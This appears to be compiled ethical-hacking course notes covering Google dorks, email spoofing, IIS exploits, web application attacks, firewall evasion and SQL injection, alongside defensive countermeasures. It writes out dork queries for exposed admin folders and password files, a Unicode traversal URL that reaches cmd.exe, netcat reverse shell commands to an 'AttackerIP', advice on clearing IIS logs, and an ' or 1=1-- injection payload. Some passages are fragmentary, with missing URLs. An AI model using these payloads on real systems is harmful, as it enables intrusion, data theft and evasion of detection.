more terms, which Google would automatically AND together, or you could start narrowing the search by using NOT to remove certain terms from your search. Google Advanced Operators: Introduction Beyond the basic searching techniques explored in the previous chapter, Google offers special terms known as advanced operators to help you perform more advanced queries.These operators, when used properly, can help you get to exactly the information you‘re looking for without spending too much time poring over page after page of search results. When advanced operators are not provided in a query, Google will locate your search terms in any area of the Web page, including the title, the text, the URL, or the like.We take a look at the following advanced operators in this chapter: (a) intitle, allintitle (b) inurl, allinurl (c) filetype (d) allintext (e) site (f) link (g) inanchor (h) daterange (i) cache (j) info (k) related (l) phonebook (m) rphonebook (n) bphonebook (o) author (p) group (q) msgid (r) insubject (s) stocks (t) define

Operator Syntax An advanced operator is nothing more than a part of a query. You provide advanced operators to Google just as you would any other query. In contrast to the somewhat free-form style of standard Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The basic syntax of a Google advanced operator is operator:search_term. When using advanced operators, keep in mind the following:

  

There is no space between the operator, the colon, and the search term. Violating this syntax can produce undesired results and will keep Google from understanding the advanced operator. In most cases, Google will treat a syntactically bad advanced operator as just another search term. For example, providing the advanced operator intitle without a following colon and search term will cause Google to return pages that contain the word intitle. The search term is the same syntax as search terms we covered in the previous chapter. For example, you can provide as a search term a single word or a phrase surrounded by quotes. If you provide a phrase as the search term, make sure there are no spaces between the operator, the colon, and the first quote of the phrase. Boolean operators and special characters (such as OR and +) can still be applied to advanced operator queries, but be sure not to place them in the way of the separating colon. Advanced operators can be combined in a single query as long as you honor both the basic Google query syntax as well as the advanced operator syntax. Some advanced operators combine better than others, and some simply cannot be combined. The ALL operators (the operators beginning with the word ALL) are oddballs. They are generally used once per query and cannot be mixed with other operators.

Google‘s Advanced Operators                    Intitle and Allintitle: Search Within the Title of a Page Allintext: Locate a String Within the Text of a Page Inurl and Allinurl: Finding Text in a URL Site: Narrow Search to Specific Sites Filetype: Search for Files of a Specific Type Link: Search for Links to a Page Inanchor: Locate Text Within Link Text Cache: Show the Cached Version of a Page Numrange: Search for a Number Daterange: Search for Pages Published Within a Certain Date Range Info: Show Google‘s Summary Information Related: Show Related Sites Author: Search Groups for an Author of a Newsgroup Post Group: Search Group Titles Insubject: Search Google Groups Subject Lines Msgid: Locate a Group Post by Message ID Stocks: Search for Stock Information Define: Show the Definition of a term Phonebook: Search Phone Listings

Google Hacking Basics:
Anonymity with Caches Google‘s cache feature is truly an amazing thing. The simple fact is that if Google crawls a page or document, you can almost always count on getting a copy of it, even if the original source has since dried up and blown away. Of course the down side of this is that hackers can get a copy of your sensitive data even if you‘ve pulled the plug on that pesky Web server. Another down side of the cache is that the bad guys can crawl your entire Web site (including the areas you ―forgot‖ about) without even sending a single packet to your server. If your Web server doesn‘t get so much as a packet, it can‘t write anything to the log files. If there‘s nothing in the log files, you might not have any idea that your sensitive data has been carried away. It‘s sad that we even have to think in these terms, but untold megabytes, gigabytes, and even terabytes of sensitive data leak from Web servers every day. Understanding how hackers can mount an anonymous attack on your sensitive data via Google‘s cache is of utmost importance. Google grabs a copy of most Web data that it crawls. There are exceptions, and this behavior is preventable. Google as a Proxy Server Although this technique might not work forever, at the time of this writing it‘s possible to use Google itself as a proxy server. This technique requires a Google translated URL and some minor URL modification. To make this work, we first need to generate a translation URL. The easiest way to do this is through Google‘s translation service, located at If you were to enter a URL into the ―Translate a web page‖ field, select a language pair, and click the Translate button, Google would translate the contents of the Web page and generate a translation URL that could be used for later reference. Langpair parameter, which is only available for the translation service, describes which languages to translate to and from, respectively. The arguments to this parameter are identical to the hl parameters. What would happen if we were to translate a page from one language into the same language? This would change our translation URL to: n&hl=en&ie=Unknown&oe=ASCII If we loaded this URL into our browser, and if the source page were in English to begin with, we would see a page. First, you should notice that the Google search page in the bottom frame of the browser window looks pretty familiar. In fact, it looks identical to the original search page. This is because no real language translation occurred. The top frame of the browser window shows the standard translation banner. Admittedly, all this work seems a bit anticlimactic, since all we have to show for our efforts is an exact copy of a page we could have just loaded directly. Fortunately, there is a payoff when we consider what happens behind the scenes. Let‘s look at another example, this time translating the Web page, monitoring network traffic with tcpdump -n -U -t. This is not a perfect proxy solution and should not be used as the sole proxy server in your toolkit. We present it simply as a example of what a little creative thinking can accomplish. While Google is acting as a proxy server, it is a transparentproxy server, which means the target Web site can still see our IP address in the connection logs, despite the fact that Google grabbed the page for us.

Directory Listings A directory listing is a type of Web page that lists files and directories that exist on a Web server. Designed to be navigated by clicking directory links, directory listings typically have a title that describes the current directory, a list of files and directories that can be clicked, and often a footer that marks the bottom of the directory listing. Much like an FTP server, directory listings offer a no-frills, easy-install solution for granting access to files that can be stored in categorized folders. Unfortunately, directory listings have many faults, specifically:  They are not secure in and of themselves. They do not prevent users from downloading certain files or accessing certain directories. This task is often left to the protection measures built into the Web server software or third-party scripts, modules, or programs designed specifically for that purpose.  They can display information that helps an attacker learn specific technical details about the Web server.  They do not discriminate between files that are meant to be public and those that are meant to remain behind the scenes.  They are often displayed accidentally, since many Web servers display a directory listing if a top-level index file (index.htm, index.html, default.asp, and so on) is missing or invalid. All this adds up to a deadly combination. Locating Directory Listings The most obvious way an attacker can abuse a directory listing is by simply finding it! Since directory listings offer ―parent directory‖ links and allow browsing through files and folders, even the most basic attacker might soon discover that sensitive data can be found by simply locating the listings and Browsing through them. Locating directory listings with Google is fairly straightforward. An obvious query to find page might be intitle:index.of, which could find pages with the term index of in the title of the document. Remember that the period (―.‖) serves as a single-character wildcard in Google. Unfortunately, this query will return a large number of false positives such as pages with the following titles:  Index of Native American Resources on the Internet  LibDex - Worldwide index of library catalogues  Iowa State Entomology Index of Internet Resources Judging from the titles of these documents, it is obvious that not only are these Web pages intentional, they are also not the type of directory listings we are looking for. Finding Specific Directories In some cases, it might be beneficial not only to look for directory listings but to look for directory listings that allow access to a specific directory. This is easily accomplished by adding the name of the directory to the search query. To locate ―admin‖ directories that are accessible from directory listings, queries such as intitle:index.of.admin or intitle:index.of inurl:admin will work well.

Finding Specific Files Because of the directory tree style, it is also possible to find specific files in a directory listing. For example, to find WS_FTP log files, try a search such as intitle:index.of ws_ftp.log.This technique can be extended to just about any kind of file by keying in on the index.of in the title and the filename in the text of the Web page. You can also use filetype and inurl to search for specific files. To search again for ws_ftp.log files, try a query like filetype:log inurl:ws_ftp.log. This technique will generally find more results than the somewhat restrictive index.of search. Server Versioning One piece of information an attacker can use to determine the best method for attacking a Web server is the exact software version. An attacker could retrieve that information by connecting directly to the Web port of that server and issuing a request for the HTTP (Web) headers. It is possible, however, to retrieve similar information from Google without ever connecting to the target server. One method involves using the information provided in a directory listing. Notice that some directory listings provide the name of the server software as well as the version number. An adept Web administrator could fake these server tags, but most often this information is legitimate and exactly the type of information an attacker will use to refine his attack against the server. The Google query used to locate servers this way is simply an extension of the intitle:index.of query. intitle:index.of “ server at” query will locate all directory listings on the Web with index of in the title and server at anywhere in the text of the page. This might not seem like a very specific search, but the results are very clean and do not require further refinement. To search for a specific server version, the intitle:index.of query can be extended even further to something like intitle:index.of “Apache/1.3.27 Server at”. In addition to identifying the Web server version, it is also possible to determine the operating system of the server (as well as modules and other software that is installed). Traversal Techniques Attackers use traversal techniques to expand a small foothold into a larger compromise.The query intitle:index.of inurl:“/admin/*” is helped to traversal. Site Operator The site operator is absolutely invaluable during the information-gathering phase of an assessment. Site search can be used to gather information about the servers and hosts that a target hosts. Using simple reduction techniques, you can quickly get an idea about a target‘s online presence. Consider the simple example of – This query effectively locates pages on the domain other than

login | logon Login portals can reveal the software and operating system of a target, and in many cases ―selfhelp‖ documentation is linked from the main page of a login portal. These documents are designed to assist users who run into problems during the login process. Whether the user has forgotten his or her password or even username,this document can provide clues that might help an attacker. Documentation linked from login portals lists e-mail addresses, phone numbers, or URLs of human assistants who can help a troubled user regain lost access. admin | administrator The word administrator is often used to describe the person in control of a network or system. The word administrator can also be used to locate administrative login pages, or login portals. The phrase Contact your system administrator is a fairly common phrase on the Web, as are several basic derivations. A query such as ―please contact your * administrator‖ will return results that reference local, company, site, department, server, system, network, database,e-mail, and even tennis administrators. If a Web user is said to contact an administrator, chances are that the data has at least moderate importance to a security tester. Searching for Passwords Password data, one of the ―Holy Grails‖ during a penetration test, should be protected. Unfortunately, many examples of Google queries can be used to locate passwords on the Web. Google Hacking Database The Google Hacking Database (GHDB) contains queries that identify sensitive data such as portal logon pages, logs with network security information, and so on. Visit Windows Registry Entries Can RevealPasswords Query like filetype:reg intext: “internet account manager” could reveal interesting keys containing password data.

Working of Emails: Email sending and receiving is controlled by the Email servers. All Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally. Once the servers are ready to go, users from across the world register in to these Email servers and setup an Email account. When they have a fully working Email account, they sign into their accounts and start connecting to other users using the Email services. Email Travelling Path: Let‘s say we have two Email providers, one is and other is, ABC is a registered user in and XYZ is a registered user in ABC signs in to his Email account in, he then writes a mail to the and click on Send and gets the message that the Email is sent successfully. But what happens behind the curtains, the Email from the computer of is forwarded to the Email server of Server1 then looks for on the internet and forwards the Email of the for the account of XYZ. receives the Email from and puts it in the account of XYZ. XYZ then sits on computer and signs in to her Email account. Now she has the message in her Email inbox.

www.syngress. www.syngress. EMAIL

Email Service Protocols:  SMTP SMTP stands for Simple Mail Transfer Protocol. SMTP is used when Email is delivered from an Email client, such as Outlook Express, to an Email server or when Email is delivered from one Email server to another. SMTP uses port 25. POP3 POP3 stands for Post Office Protocol. POP3 allows an Email client to download an Email from an Email server. The POP3 protocol is simple and does not offer many features except for download. Its design assumes that the Email client downloads all available Email from the server, deletes them from the server and then disconnects. POP3 normally uses port 110. IMAP IMAP stands for Internet Message Access Protocol. IMAP shares many similar features with POP3. It, too, is a protocol that an Email client can use to download Email from an Email server. However, IMAP includes many more features than POP3. The IMAP protocol is designed to let users keep their Email on the server. IMAP requires more disk space on the server and more CPU resources than POP3, as all Emails are stored on the server. IMAP normally uses port 143.

Email Server Configuration: Email server software like Postcast Server, Hmailserver, SurgEmail, etc can be used to convert your Desktop PC into an Email sending server. HMailServer is an Email server for Microsoft Windows. It allows you to handle all your Email yourself without having to rely on an Internet service provider (ISP) to manage it. Compared to letting your ISP host your Email, HMailServer adds flexibility and security and gives you the full control over spam protection. Email Security: Now let‘s check how secure this fast mean of communication is. There are so many attacks which are applied on Emails. There are people who are the masters of these Email attacks and they always look for the innocent people who are not aware of these Email tricks and ready to get caught their trap. You have to make sure that you are not an easy target for those people. You have to secure your mail identity and profile, make yourself a tough target. If you have an Email Id Do not feel that it does not matters if gets hacked because there is no important information in that Email account, because you do not know if someone gets your Email id password and uses your Email to send a threatening Email to the Ministry or to the News Channels. Attacker is not bothered about your data in the Email. He just wants an Email ID Victim which will be used in the attack. There are a lots of ways by which one can use your Email in wrong means, i am sure that you would have come across some of the cased where a student gets an Email from his friends Abusing him or cases on Porn Emails where the owner of the Email does not anything about the sent Email.

Email Spoofing: Email spoofing is the forgery of an Email header so that the message appears to have originated from someone or somewhere other than the actual source. Distributors of spam often use spoofing in an attempt to get recipients to open, and possibly even respond to, their solicitations. Spoofing can be used legitimately. There are so many ways to send the Fake Emails even without knowing the password of the Email ID. The Internet is so vulnerable that you can use anybody's Email ID to send a threatening Email to any official personnel. Fake Email- Open Relay Server: An Open Mail Relay is an SMTP (Simple Mail Transfer Protocol) server configured in such a way that it allows anyone on the Internet to send Email through it, not just mail destined ‗To‘ or ‗Originating‘ from known users. An Attacker can connect the Open Relay Server via Telnet and instruct the server to send the Email. Open Relay Email Server requires no password to send the Email. Fake Email- Web Script: Web Programming languages such as PHP and ASP contain the mail sending functions which can be used to send Emails by programming Fake headers i.e.‖ From: To: Subject:‖ There are so many websites available on the Internet which Already contains these mail sending scripts. Most of them provide the free service. Some of Free Anonymous Email Websites are:  (Send attachments as well)    Fake Email- Consequences:     Email from your Email ID to any Security Agency declaring a Bomb Blast can make you spend rest of your life behind the iron bars. Email from you to your Girl friend or Boy friend can cause Break-Up and set your friend‘s to be in relationship. Email from your Email ID to your Boss carrying your Resignation Letter or anything else which you can think of. There can be so many cases drafted on Fake Emails.

Fake Email- Proving:     Every Email carry Header which has information about the Travelling Path of the Email. Check the Header and Get the location from the Email was Sent. Check if the Email was sent from any other Email Server or Website. Headers carry the name of the Website on which the mail sending script was used.

Email Bombing: Email Bombing is sending an Email message to a particular address at a specific victim site. In many instances, the messages will be large and constructed from meaningless data in an effort to consume additional system and network resources. Multiple accounts at the target site may be abused, increasing the denial of service impact. Email Spamming: Email Spamming is a variant of Bombing; it refers to sending Email to hundreds or thousands of users (or to lists that expand to that many users). Email spamming can be made worse if recipients reply to the Email, causing all the original addressees to receive the reply. It may also occur innocently, as a result of sending a message to mailing lists and not realizing that the list explodes to thousands of users, or as a result of a responder message (such as vacation(1)) that is setup incorrectly. Email Password Hacking: There is no specified attack available just to hack the password of Email accounts. Also, it is not so easy to compromise the Email server like Yahoo, Gmail, etc. Email Password Hacking can be accomplished via some of the Client Side Attacks. We try to compromise the user and get the password of the Email account before it reaches the desired Email server. Phishing Attack The act of sending an Email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the use into surrendering private information that will be used for identity theft. The Email directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is Bogus and set up only to steal the User‘s information. Phishing Scams could be     Emails inviting you to Join a Social Group, asking you to Login using your Username and Password. Email saying that Your Bank Account is locked and Sign in to your Account to Unlock IT. Emails containing some Information of your Interest and asking you to Login to Your Account. Any Email carrying a Link to Click and Asking you to Login

Prevention against Phishing     Read all the Email Carefully and Check if the Sender is Original. Watch the Link Carefully before Clicking. Always check the URL in the Browser before Signing IN to your Account. Always Login to Your Accounts after opening the Trusted Websites, not by clicking in any other Website or Email.

Email Tracing: Tracing an Email means locating the Original Sender and Getting to know the IP address of the network from which the Email was actually generated. To get the information about the sender of the Email we first must know the structure of the Email. As we all know the travelling of the Email. Each message has exactly one header, which is structured into fields. Each field has a name and a value. Header of the Email contains all the valuable information about the path and the original sender of the Email.   Check the headers in differ Email Service Providers. Locating the Sender.  You can easily get the IP Address of the sender from the header and then can locate the sender.  Once you have the IP Address of the sender, go to the and Find the location of the IP Address.

Securing Your Email Account: Always configure a Secondary Email Address for the recovery Purpose. Properly configure the Security Question and Answer in the Email Account. Do Not Open Emails from strangers. Do Not Use any other‘s computer to check your Email. Take Care of the Phishing Links. Do not reveal your Passwords to your Friends or Mates

Hacking Web Servers Web hacking is a critical topic because much of the Internet is devoted to e-commerce. This traffic is typically allowed through a firewall or border router, so there is considerable risk involved. Web Server Identification While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are other ports that should be scanned for when looking for web-based applications. These include the following:

    

88 – Kerberos 2779 - Windows 2000 Web Server 8080 – Squid 8888 – Alternate Web Server Some of the most popular tools used to scan for these services include: Nmap, Netscan Tools and Superscan.

Web Server Enumeration Once possible web servers have been identified, the attacker will usually attempt to enumerate the web server vendor. The most popular web servers include: IIS Web Server, Apache Web Server and Sun ONE Web Server. Common tools used to determine what the web server is running include: Nmap, Telnet, and web sites such as Netcraft. Vulnerability Identification Once the attacker has identified the vendor and version of the web server, he will then search for vulnerabilities. Some of the sites the attacker and security administrators would most likely visit to identify possible vulnerabilities include:    The security administrator should also consider running an automated vulnerability scanning software package. Several of these are worth mentioning: WebInspect, Whisker, N-Stealth Scanner, Nessus and Shadow Security Scanner. Vulnerability Exploitation IIS may seem to be the target of many attacks, but this is partially due to the fact that it is so widely used. Others such as Apache, have also been targeted for attack and have their share of vulnerabilities. Attackers will take the least path of resistance. If this happens to be the web server, expect it to be targeted. Some common exploits are discussed below. ISAPI DLL Buffer Overflows This exploit targets idq.dll. When executed, this attack can lead to a buffer overflow that can compromise servers running IIS. What makes this vulnerability particular malicious is that the service, part of IIS Indexing, does not even need to be running. Because the idq.dll runs as system, the attacker can easily escalate his privilege and add himself to the administrator‘s group. IPP Printer Overflow This buffer overflow attack also targets the ISAPI filter (mws3ptr.dll) that handles printer files. If the buffer is sent at least 420 characters, it will overflow and may potentially return a command prompt to the attacker. There are several tools available to exploit this vulnerability; jill-win32 is an example of one.

ISAPI DLL Source Disclosure Because of vulnerabilities in the ISM.dll, IIS4 and IIS5 can be made to disclose source data, rather than executing it. An attacker accomplishes this by appending +.htr to the global .asa file.

IIS Directory Traversal This vulnerability allows an attacker to back out of the current directory and go wherever he would like within the logical drive‘s structure. Two iterations of this attack are: Unicode Double Decode These attacks are possible because of the way in which the Unicode is parsed. These overly long strings (as shown below) bypass the filters that are designed to only check short Unicode. http://target//vulnerablefolder/..%c0%af..%c0%af..%c0%af..%c%af../winnt/system32/cmd. exe?/c+dir+c:\ Directory Listing The attacker can then place this Unicode string in the browser or script the attack with a tool such as NetCat. If the attacker can access cmd.exe, he is only a few steps away from owning the box. Back in 2001, the Nimda worm used this same vulnerability to ravage web servers. Shoveling the Shell For the final step, the attacker needs only to complete the following two steps. At that point, a command shell will be returned to his computer with system privileges.  Execute nc.exe -l -p <Open Port> from the attacker‘s computer.  Execute nc.exe -v -e cmd.exe AttackerIP <Open Port> from the compromised server. Escalating Privileges on IIS Some well-known privilege escalation tools are: GetAdmin, HK, PipeupAdmin and IIScrack.dll (httpodbc.dll). This completes the system hack, as the attacker now has administrator privileges on the computer. Clearing IIS Logs Just as with any other attack, expect the attacker to attempt to remove or alter the log files located at C:\Winnt\system32\Logfiles\W3SVC1, as they will most likely have a record of the attacker‘s IP address.

File System Traversal Countermeasures Countermeasures include:  Apply current patches  Move cmd.exe  Separate the OS and Applications by using two logical partitions  Remove executable permissions from the IUSR account

Securing IIS As always, the best defense is a good offense. So, there is never going to be a better time than now to make sure your web server is locked down. There are some good tools available for you to accomplish this task.  UpdateExpert  Microsoft HotFix Checker  IIS Lockdown  Microsoft Baseline Security Analyzer  Calcs Web Application Vulnerabilities Footprinting The methodology for assessing web applications is the same as all of the other services we have examined. The attacker will attempt to gather as much information as possible about the site, as to understand its function, design, and purpose. One good tool that can be used to gather information is Instant Source. Directory Structure The most efficient way to determine the directory structure is with the use of a site ripping tool. Site ripping tools allow the attacker to download the entire site locally. Once the site has been duplicated, the attacker can start to examine the directory structure, make an analysis of the site design, perform source sifting, and look for clues that can identify the type of underlying web applications. Some excellent site ripping tools include: Wget, Black Widow and WebSleuth. Documenting the Application Structure Once the underlying applications have been uncovered, the attacker can then search the web to look for vulnerabilities. If vulnerabilities are present, the attacker will also check the web application vendors‘ web site. Many times, vendors are so proud of their products, they will list all of their clients. This list of clients can be used to immediately target other vulnerable web sites.

Input Validation Another huge problem with web applications is that of client-side data. Any time data is passed from the client to the server, it must be checked. Without proper input validation, the web application can be tricked into accepting invalid input.

Hidden Value Fields Hidden value fields are embedded inside of the html code. The theory is that if end users cannot see it, it is safe from tampering. The flaw in that logic is that anyone that views the page source can see the hidden fields. Many sites use these hidden value fields to store the price of the product that is passed to the web application. If the attacker saves the web page locally and then modifies the amount, the new value will be passed to the web application. If no input validation is performed, the application will accept the new, manipulated value. Cross Site Scripting Another popular web application hack is cross-site scripting. Web applications that use cookies and fail to properly identify the user are potentially vulnerable. Sending the victim an e-mail with a malicious link embedded is the way this attack is committed. Victims that fall for the ruse and click on the link will have their credentials stolen. Sites running PHPnuke have been particularly hard hit by this attack. Cross-Site Scripting Countermeasures This attack, like others, can be prevented. Consider the following:  Patch the program  Validate all input that your dynamic page receives  Be leery of embedded links  Disable scripting language support Web Based Password Cracking Techniques Authentication Types Authentication types include:  Basic  Message Digest  Certificate  Microsoft Passport  Forms Based You should be familiar with the details of each of these authentication types.

Web-based Password Cracking There are an unlimited number of tools available to the attacker to attempt to break into web-based applications. If the site does not employ a lockout policy, it is only a matter of time and bandwidth before the attacker can gain entry. Some of these password cracking tools are: WebCracker, Brutus, ObiWan, Munga, Bunga, Variant and PassList. Stealing Cookies If the attacker can gain physical access to the victim‘s computer, then there are various tools that can be used to steal cookies or to view hidden passwords. These include the following: CookieSpy and SnadBoy. Buffer Overflows Poorly written programs and the lack of boundary checking can cause buffer overflows. Anytime bad data can be entered into an application that causes it to crash, blue screen, or drop to root prompt, there‘s a problem! Buffer overflows can result in:   Attackers being able to run their code in privileged mode access Freezing, rebooting, data corruption, or lockup of the attacked system

Exploitation Many of today‘s most popular attacks are the result of buffer overflows. These include:  Jill-Win32 – IIS Buffer Overflow Attack  SQL2.exe – SQL Buffer Overflow Attack  WSFTP – DoS Buffer Overflow Attack  Named NXT – BIND Buffer Overflow Attack While you may never write a buffer overflow program, you should be familiar with its structure. Detecting Buffer Overflows There are two primary ways to detect buffer overflows:  Proactive - Have an experienced programmer examine the code to verify it is written correctly;  Reactive – Release a faulty program and wait until the attacker attacks the application by feeding it long strings of data and observing its reaction. Skills Required to Exploit Buffer Overflows The skills required to exploit a buffer overflow include:  Knowledge of the Stack  Assembly Language  C Programming  The ability to guess key parameters

Defense Against Buffer Overflows The best defense against buffer overflows is to start with a robust and secure program. Safer C program calls should be used and the finished code should be audited. When dealing with precompiled programs, you should always make sure the latest patches are applied and that the program is executed at the least possible privilege. Tools for Compiling Programs Robust Code Some of the tools that are available to insure robust code include:  StackGuard  Immunix IDS, Firewalls & Honeypots Intrusion Detection Systems IDS systems can be software or hardware based. While some are simple software applications, others are high-end hardware based products. No matter what the platform, they share a common purpose, which is to monitor events on hosts or networks and notify security administrators in the event of an anomaly. IDS systems come in two basic types:  Anomaly Detection  Signature Recognition. Anomaly Detection This method of monitoring works by looking for traffic that is outside the bounds of normal traffic. While this works well, it can be fooled by slowly changing traffic patterns. This can sometimes fool the IDS into believing the illicit traffic is acceptable. Signature Recognition This method of monitoring works by comparing traffic to known attack signatures. It is as effective as its most current update. It cannot detect an attack that is not in its database. While signature and anomaly based IDS systems are the most commonly deployed types, other hybrid IDS systems, such as honeypots, can be useful tools in detecting potential security breaches. IDS Signature Matching Signature matching works by capturing traffic and examining it to make sure that it complies with known:  Protocol Stack Rules  Application Protocol Rules

IDS Software Vendors There are many vendors for IDS systems. As a security administrator, your biggest concern should be who will watch over and administrate the IDS. As once stated, ―IDS systems are like 3-year old children as they require constant attention.‖ If you are not able to provide that amount of attention and manpower, consider outsourcing the task to a qualified third party. Some well-known IDS products include: SNORT, Cybercop, RealSecure and BlackIce. Evading IDS An attacker can use a host of programs to attempt to evade an IDS. He may even encrypt his data to prevent an IDS from analyzing its content. Some of the tools an attacker may use to try and fool an IDS include: Fragrouter, TCPReplay, SideStep, NIDSbench and ADMutate. Hacking Through Firewalls Firewalls function primarily by one of the three following methods:  Packet Filtering  NAT  Proxy While it is not always possible to hack through firewalls, there are tools and techniques available to determine their manufacturer, presence, and rule set. There are also ways to detect firewalls. As an example, whenever you perform a traceroute and notice that the two final hops show the same IP address, it‘s probable that you are dealing with a stateful inspection firewall. At this point, you may want to try to connect. Many firewalls will divulge their presence by simply connecting to them. Use tools such as Telnet and FTP to attempt a banner grab from the firewall. Tools such as firewalk can be used to further enumerate the firewall‘s rule set. Firewalk works by tweaking the IP TTL value, so that packets expire one hop beyond the gateway. Finally, Nmap is another valuable tool that shouldn‘t be overlooked. It too, can be used to attempt enumeration of the firewall. Nmap‘s reported results, be it open, closed, or filtered, can tell the attacker a lot about the firewall‘s architecture. Filtered messages are commonly returned when Nmap receives an ICMP type 3 Code 13 response. Reference RFC 792 to learn more about how ICMP functions. Placing Backdoors Behind Firewalls A much easier technique than hacking through the firewall, is to simply place a backdoor behind it. Firewalls cannot deny what they must permit. There will usually be several ports open for the skilled attacker to use. These include:  UDP 53 – DNS  TCP 25 - SMTP  TCP 80 – HTTP  ICMP 0/8 – Ping Hiding Behind Covert Channels Using one of these open ports is a good way for the attacker to covertly send data out of the

organization. Some of the tools commonly used here include:  NetCat – Can use any TCP/UDP open port  CryptCat – Same as NetCat, but carries the payload in an encrypted format  ACK CMD - Uses TCP ACK‘s as a covert channel  Loki – Uses ICMP as a covert channel. Looks like common ping traffic  Reverse WWW Shell – Uses HTTP as a covert channel

Honeypots Honeypots are systems that contain phony files, services, and databases. They are deployed to distract the attacker from the real target and give the administrator enough time to be alerted. For these lures to be effective, they must adequately persuade the attacker that he has discovered a real system. Products such as Network Associates‘ CyberCop Sting, simulate an entire network, including routers and hosts that are actually all located on a single computer. Honeypot Vendors There are many honeypot vendors. The two most important issues with honeypots are entrapment and enticement. Some honeypot vendors are listed below for your review. Each link offers good information about this fascinating subject.  Deception Toolkit -  HoneyD -  LaBrea Tarpit -  ManTrap -  Single-Honeypot -  Smoke Detector -  Specter - Cryptography PKI Public key infrastructure provides a variety of valuable security services, such as key management, authorization, and message integrity through the use of digital signatures. PKI also extends a fourth basic feature to the security triad, that of non-repudiation:  Confidentiality  Integrity  Authentication  Non-repudiation X.509 is one of the key standards that govern the use of PKI. Digital Certificates A digital certificate is a record used for authentication and encryption. It serves as a basic

component of PKI. RSA is the default encryption standard used with digital certificates and when the certificate is requested from a CA (Certificate Authority), the request is comprised of the following four fields:  The DN (Distinguished Name) of the CA  The Public key of the user  Algorithm identifier  The user‘s Digital signature

RSA is a public key cryptosystem in which one key is used for encryption (public key) and the other is used for decryption (private key). RSA (Rivest Shamir Adleman) was developed in 1977 to help secure Internet transactions. Hashing Algorithms Hashing algorithms can be used for digital signatures or to verify the validity of a file. It is a oneway process and is widely used.  MD5 – 128 bit message digest  SHA - 160 bit message digest SSL Netscape developed SSL (Secure Sockets Layer) and almost all browsers and web servers support it. SSL‘s focus is on securing web transactions. The client is responsible for creating the session key after the server‘s identity has been verified. SSL is limited in strength by the cryptographic tools on which it is based. PGP PGP (Pretty Good Privacy) is a public encryption package that allows individuals to encrypt email and other personal data. SSH SSH (Secure Shell) is an excellent replacement for Telnet and FTP. It operates on port 22 and is available in two versions: SSH and SSH2.

Session Hijacking
Spoofing Vs Hijacking Spoofing is the act of masquerading as another user, whereas session hijacking attempts to attack and take over an existing connection. The attacker will typically intercept the established connection between the authorized user and service. The attacker will then take over the session and assume the identity of the authorized user. Session hijacking attacks can range from basic

sniffing, to capture the authentication between a client and server, to hijacking the established session to trick the server into thinking it has a legitimate session with the server.

Session Hijacking Steps To successfully hijack a session, several items must come into place.  The attacker must be able to track and intercept the traffic  The attacker must be able to desynchronize the connection  The attacker must be able to inject his traffic in place of the victim‘s If successful, the attacker can then simply sit back and observe or actively take over the connection. Passive Session Hijacking – The process of silently sniffing the data exchange between the user and server. Active Session Hijacking – The process of killing the victim‘s connection and hijacking it for malicious intent. TCP Concepts To understand hijacking, you must know how TCP functions. As TCP is a reliable service, a 3step startup is performed before data is transported. TCP 3-step startup Before two computers can communicate, TCP must set up the session. This setup is comprised of three steps. Once these three steps are completed, the two computers can exchange data. The 3step startup is shown below:  Client -- SYN - Server  Client - SYN / ACK -- Server  Client -- ACK Server Sequence Numbers During the first two steps of the three-step startup, the two computers that are going to communicate exchange sequence numbers. These numbers enable each computer to keep track of how much information has been sent and the order in which the packets must be reassembled. An attacker must successfully guess the sequence number to hijack the session.

Session Hijacking Tools There are many tools available to hijack a session. Some of these tools include:  Juggernaut  Hunt  SolarWinds  TCP Session Reset Utility

Session Hijacking Countermeasures Session hijacking is not one of the easiest attacks for an attacker to complete. It can, however, have disastrous results for the victim if successful. Organizations should consider replacing clear text protocols, such as FTP and Telnet, with more secure protocols such as SSH. Also, administrative controls such as time stamps, sequence numbers, and digital signatures can be used to prevent anti-replay attacks. SQL Injection Some organizations are so focused on their web servers, that they may never realize that the attacker may have another target in mind. The organization‘s most valuable assets are not on the web server, but contained within the company‘s database. This juicy target can contain customer data, credit card numbers, passwords, or other corporate secrets. Attackers search for and exploit databases that are susceptible to SQL injection. SQL injection occurs when an attacker is able to insert SQL statements into a query by means of a SQL injection vulnerability. SQL injection as the name suggest is a type of security attack in which the attacker (injects) inputs specially crafted Structured Query Language (SQL) code through a web browser to gain access to resources, or make changes the data. It is a technique of injecting SQL commands to exploit non-validated input loopholes in a web application database. Programmers use sequential commands with user input, making it easier for attackers to inject commands at a very fast speed and accuracy. It also takes advantage of unsafe queries in web applications and builds dynamic SQL queries. SQL Insertion Discovery Attackers typically scan for port 1433 to find Microsoft SQL databases. Once identified, the attacker will place a single ‗inside a username field to test for SQL vulnerabilities. The attacker will look for a return result similar to the one shown below: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ‗ and Password=''./login.asp, line 42 This informs the attacker that SQL injection is possible. At this point, the attacker can shut down the server, execute commands, extract the database, or do just about anything else he wants to do.

SQL Injection Vulnerabilities SQL servers are vulnerable because of poor coding practices, lack of input validation, and the failure to update and patch the service. The two primary vulnerabilities are:  Unpatched Systems  Blank sa Password

Steps for performing SQL Injection Now the most common question that arises in the mind is what tool would one require to take out a SQL Attack. And the answer is quite simple : Any web browser would be good enough for a SQL attack. How to do a SQL attack? First of all we should look for pages that allow user to submit data, like login page, search page, feedback, etc. If we have a HTML page we should check the source code for whether it is using POST or GET, look for the <Form> tag in the source code <Form action=search.asp method=post> <input type=hidden name=X value=Z> </Form> If not, check for pages like ASP, JSP, CGI, or PHP Example: Check the URL that takes the following parameters:  http:// /index.asp?id=10 In the above example, attackers might attempt: ‘ or 1=1— SQL Injection Techniques In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application. SQL or Structured Query Language is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (or a collection of tables which organize and structure data). SQL is, in fact, the only way that a web application (and users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which use SQL as their basic building blocks.

SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and in fact will eliminate the table with a particular name. In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look like the following: SELECT count(*) FROM users_list_table WHERE username=‘FIELD_USERNAME‘ AND password=‘FIELD_PASSWORD‖

